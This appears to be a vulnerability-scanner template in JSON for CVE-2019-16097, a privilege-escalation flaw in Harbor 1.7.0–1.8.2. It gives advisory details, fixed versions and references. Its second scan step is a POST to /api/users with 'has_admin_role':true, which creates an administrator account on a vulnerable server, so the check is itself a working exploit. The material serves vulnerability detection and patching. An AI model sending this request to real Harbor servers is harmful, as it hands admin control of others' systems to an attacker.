{ "Name": "Harbor Remote Privilege Escalation Vulnerability (CVE-2019-16097)", "Description": "core/api/user.go in Harbor 1.7.0 through 1.8.2 allows non-admin users to create admin accounts via the POST /api/users API, when Harbor is setup with DB as authentication backend and allow user to do self-registration. Fixed version: v1.7.6 v1.8.3. v.1.9.0. Workaround without applying the fix: configure Harbor to use non-DB authentication backend such as LDAP.", "Product": "Harbor", "Homepage": "https://goharbor.io", "DisclosureDate": "2019-09-08", "Author": "gobysec@gmail.com", "FofaQuery": "", "GobyQuery": "app=\"Harbor\"", "Level": "3", "Impact": "It allowing remote non-administrative users to take over the Harbor repository by creating an administrator account upon addition of specified parameters to the POST /api/users API.", "Recommendation": "The Harbor team and VMware both released the latest versions to fix the vulnerability in question. Users are advised to download them from the following addresses for immediate protection against this vulnerability.", "References": [ "http://www.vmware.com/security/advisories/VMSA-2019-0015.html", "https://github.com/goharbor/harbor/commit/b6db8a8a106259ec9a2c48be8a380cb3b37cf517", "https://github.com/goharbor/harbor/compare/v1.8.2...v1.9.0-rc1", "https://github.com/goharbor/harbor/releases/tag/v1.7.6", "https://github.com/goharbor/harbor/releases/tag/v1.8.3", "https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/", "https://nvd.nist.gov/vuln/detail/CVE-2019-16097", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16097" ], "HasExp": false, "ExpParams": null, "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "data": "", "data_type": "text", "follow_redirect": false, "method": "GET", "uri": "/api/systeminfo", "header": { "Accept": "*/*", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0" } }, "ResponseTest": { "checks": [ { "bz": "", "operation": "==", "type": "item", "value": "200", "variable": "$code" }, { "bz": "", "operation": "regex", "type": "item", "value": "harbor_version.*?v1\\.(7\\.[0-5]|8\\.[0-2])[-\"]", "variable": "$body" } ], "operation": "AND", "type": "group" } }, { "Request": { "data": "{\"username\":\"z1z1z1\",\"email\":\"z1z1z1@gmail.com\",\"realname\":\"z1z1z1\",\"password\":\"Password123\",\"comment\":\"test\",\"has_admin_role\":true}", "data_type": "text", "follow_redirect": false, "method": "POST", "uri": "/api/users", "header": { "Content-Type": "application/json", "Referer": "{{{fixedhostinfo}}}", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0" } }, "ResponseTest": { "checks": [ { "bz": "", "operation": "==", "type": "item", "value": "201", "variable": "$code" }, { "type": "group", "operation": "AND", "checks": [ { "bz": "", "operation": "==", "type": "item", "value": "409", "variable": "$code" }, { "bz": "", "operation": "contains", "type": "item", "value": "username has already been used!", "variable": "$body" } ] } ], "operation": "OR", "type": "group" } } ], "ExploitSteps": null, "Tags": null, "CVEIDs": [ "CVE-2019-16097" ], "CVSSScore": "6.5", "AttackSurfaces": { "Application": ["Harbor"], "Support": null, "Service": null, "System": null, "Hardware": null }, "Disable": false }